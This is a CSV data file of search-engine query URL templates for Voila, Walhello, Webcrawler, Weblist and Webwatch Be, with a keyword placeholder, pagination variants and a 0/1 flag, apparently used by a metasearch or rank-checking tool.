"International","Voila 2 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=11&dd=web&an=10","0"
"International","Voila 2 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=11&dd=web&an=10","0"
"International","Voila 2 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=11&dd=web&an=10","0"
"International","Voila 2 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=11&dd=web&an=10","0"
"International","Voila 3 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=21&dd=web&an=10","1"
"International","Voila 3 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=21&dd=web&an=10","0"
"International","Voila 3 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=21&dd=web&an=10","0"
"International","Voila 3 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=21&dd=web&an=10","0"
"International","Voila 3 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=21&dd=web&an=10","0"
"International","Voila 3 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=21&dd=web&an=10","0"
"International","Voila 4 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=31&dd=web&an=10","1"
"International","Voila 4 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=31&dd=web&an=10","0"
"International","Voila 4 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=31&dd=web&an=10","0"
"International","Voila 4 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=31&dd=web&an=10","0"
"International","Voila 4 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=31&dd=web&an=10","0"
"International","Voila 4 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&gb=site&bl=fr&cid=ng&ap=31&dd=web&an=10","0"
"International","Voila 5 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=41&dd=web&an=10","1"
"International","Voila 5 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=41&dd=web&an=10","0"
"International","Voila 5 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=41&dd=web&an=10","0"
"International","Voila 5 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=41&dd=web&an=10","0"
"International","Voila 5 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=41&dd=web&an=10","0"
"International","Voila 5 (Next 10)","http://search.ke.voila.fr/S/voila?dt=%2A&kw={SEARCH_KEYWORD}&lg=fr&bl=fr&gb=site&cid=ng&ap=41&dd=web&an=10","0"
"International","Walhello","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&nummer=0&vert=2&taal=a","0"
"International","Walhello","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&ap=Internet+Search","0"
"International","Walhello","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&ap=Internet+Search","0"
"International","Walhello","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&nummer=0&vert=2&taal=a","0"
"International","Walhello","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&nummer=0&vert=2&taal=a","0"
"International","Walhello","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&ap=Internet+Search","0"
"International","Walhello 2 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&fam=all&web=no&&vert=2&mul=0","0"
"International","Walhello 2 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&&web=no&&vert=0&","0"
"International","Walhello 2 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&&web=no&&vert=0&","0"
"International","Walhello 2 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&fam=all&web=no&&vert=2&mul=0","0"
"International","Walhello 2 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&fam=all&web=no&&vert=2&mul=0","0"
"International","Walhello 2 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&&web=no&&vert=0&","0"
"International","Walhello 3 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&no&no&no&vert=2&no","0"
"International","Walhello 3 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&&web=no&&vert=0&","0"
"International","Walhello 3 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&&web=no&&vert=0&","0"
"International","Walhello 3 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&no&no&no&vert=2&no","0"
"International","Walhello 3 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&no&no&no&vert=2&no","0"
"International","Walhello 3 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&&web=no&&vert=0&","0"
"International","Walhello 4 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&no&no&no&vert=2&no","0"
"International","Walhello 4 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&&web=no&&vert=0&","0"
"International","Walhello 4 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&&web=no&&vert=0&","0"
"International","Walhello 4 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&no&no&no&vert=2&no","0"
"International","Walhello 4 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&no&no&no&vert=2&no","0"
"International","Walhello 4 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&&web=no&&vert=0&","0"
"International","Walhello 5 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&no&no&no&vert=2&no","0"
"International","Walhello 5 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&&web=no&&vert=0&","0"
"International","Walhello 5 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&&web=no&&vert=0&","0"
"International","Walhello 5 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&no&no&no&vert=2&no","0"
"International","Walhello 5 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&no&no&no&vert=2&no","0"
"International","Walhello 5 (Next 10)","http://www.walhello.info/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&&web=no&&vert=0&","0"
"International","WalHello IS","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a","0"
"International","WalHello IS","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a","0"
"International","WalHello IS","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a","0"
"International","WalHello IS 2 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&no&no&no&vert=0&no","0"
"International","WalHello IS 2 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&no&no&no&vert=0&no","0"
"International","WalHello IS 2 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=1&no&no&no&vert=0&no","0"
"International","WalHello IS 3 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&no&no&no&vert=0&no","0"
"International","WalHello IS 3 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&no&no&no&vert=0&no","0"
"International","WalHello IS 3 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=2&no&no&no&vert=0&no","0"
"International","WalHello IS 4 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&no&no&no&vert=0&no","0"
"International","WalHello IS 4 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&no&no&no&vert=0&no","0"
"International","WalHello IS 4 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=3&no&no&no&vert=0&no","0"
"International","WalHello IS 5 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&no&no&no&vert=0&no","0"
"International","WalHello IS 5 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&no&no&no&vert=0&no","0"
"International","WalHello IS 5 (Next 10)","http://80.60.35.143/cgi-bin/search?key={SEARCH_KEYWORD}&taal=a&nummer=4&no&no&no&vert=0&no","0"
"International","Webcrawler","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=1&top=1&start=&ver=6447","1"
"International","Webcrawler","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=1&top=1&start=&ver=6447","0"
"International","Webcrawler","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=1&top=1&start=&ver=6447","0"
"International","Webcrawler 2 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=31&top=2&start=&ver=19403","1"
"International","Webcrawler 2 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=31&top=2&start=&ver=19403","0"
"International","Webcrawler 2 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=31&top=2&start=&ver=19403","0"
"International","Webcrawler 3 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=61&top=3&start=&ver=4197","1"
"International","Webcrawler 3 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=61&top=3&start=&ver=4197","0"
"International","Webcrawler 3 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=61&top=3&start=&ver=4197","0"
"International","Webcrawler 4 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=91&top=4&start=&ver=1645","1"
"International","Webcrawler 4 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=91&top=4&start=&ver=1645","0"
"International","Webcrawler 4 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=91&top=4&start=&ver=1645","0"
"International","Webcrawler 5 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=121&top=5&start=&ver=24583","1"
"International","Webcrawler 5 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=121&top=5&start=&ver=24583","0"
"International","Webcrawler 5 (Next 30)","http://dpxml.webcrawler.com/_1_6TUTI403KHRL8U__info.wbcrwl/dog/results?otmpl=dog/webresults.htm&qcat=web&qkw={SEARCH_KEYWORD}&qk=30&nextid=mstail17.sef.inspinc.ad:1057557441600:0:0&method=0&dpcollation=1&rpe=30&eng1=About&eng2=askjeeves&eng3=Fast&eng4=FindWhat&eng5=LookSmart&eng6=OpenDirectory&eng7=Overture&eng8=Sprinks&eng9=MetaSearchPicks&eng10=MetaSearchSearchPartnerNetwork&eng11=Google&eng12=Inktomi&eng13=SearchHippo&eng14=teoma&eng15=teoma&qi=121&top=5&start=&ver=24583","0"
"International","Weblist","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=1&l=e","1"
"International","Weblist","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=1&l=e","0"
"International","Weblist","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=1&l=e","0"
"International","Weblist","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=1&l=e","0"
"International","Weblist","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=1&l=e","0"
"International","Weblist","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=1&l=e","0"
"International","Weblist 2 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=2&l=e","1"
"International","Weblist 2 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=2&l=e","0"
"International","Weblist 2 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=2&l=e","0"
"International","Weblist 2 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=2&l=e","0"
"International","Weblist 2 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=2&l=e","0"
"International","Weblist 2 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=2&l=e","0"
"International","Weblist 3 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=3&l=e","1"
"International","Weblist 3 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=3&l=e","0"
"International","Weblist 3 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=3&l=e","0"
"International","Weblist 3 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=3&l=e","0"
"International","Weblist 3 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=3&l=e","0"
"International","Weblist 3 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=3&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=4&l=e","1"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=5&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=4&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=5&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=4&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=5&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=4&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=5&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=4&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=5&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=4&l=e","0"
"International","Weblist 4 (Next 50)","http://weblist.ru/weblist-bin/search?p={SEARCH_KEYWORD}&page=5&l=e","0"
"International","Webwatch Be","http://www.webwatch.be/Webwatch.dlp?CurrentPage=1&findindb=internet%20AND%20marketing&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=1","0"
"International","Webwatch Be","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=1","0"
"International","Webwatch Be","http://www.webwatch.be/Webwatch.dlp?CurrentPage=1&findindb=internet%20AND%20marketing&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be","http://www.webwatch.be/Webwatch.dlp?CurrentPage=1&findindb=internet%20AND%20marketing&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=1","0"
"International","Webwatch Be 1 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=2","1"
"International","Webwatch Be 1 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=2","0"
"International","Webwatch Be 1 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=2","0"
"International","Webwatch Be 10 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=10&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 10 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=10&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 10 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=10&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 2 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=2&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 2 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=3","0"
"International","Webwatch Be 2 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=3","0"
"International","Webwatch Be 2 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=2&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 2 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=2&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 2 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=3","0"
"International","Webwatch Be 3 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=3&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 3 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=4","0"
"International","Webwatch Be 3 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=4","0"
"International","Webwatch Be 3 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=3&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 3 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=3&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 3 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=4","0"
"International","Webwatch Be 4 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=4&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 4 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=5","0"
"International","Webwatch Be 4 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=5","0"
"International","Webwatch Be 4 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=4&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 4 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=4&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 4 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=5","0"
"International","Webwatch Be 5 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=5&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","1"
"International","Webwatch Be 5 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=6","0"
"International","Webwatch Be 5 (Next 10)","http://www.webwatch.be/webwatch.cfm?q={SEARCH_KEYWORD}&n=0&p=6","0"
"International","Webwatch Be 5 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=5&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
"International","Webwatch Be 5 (Next 10)","http://www.webwatch.be/Webwatch.dlp?CurrentPage=5&findindb={SEARCH_KEYWORD}&MainCat=&Collection=AllWW_UK&newsearch=0","0"
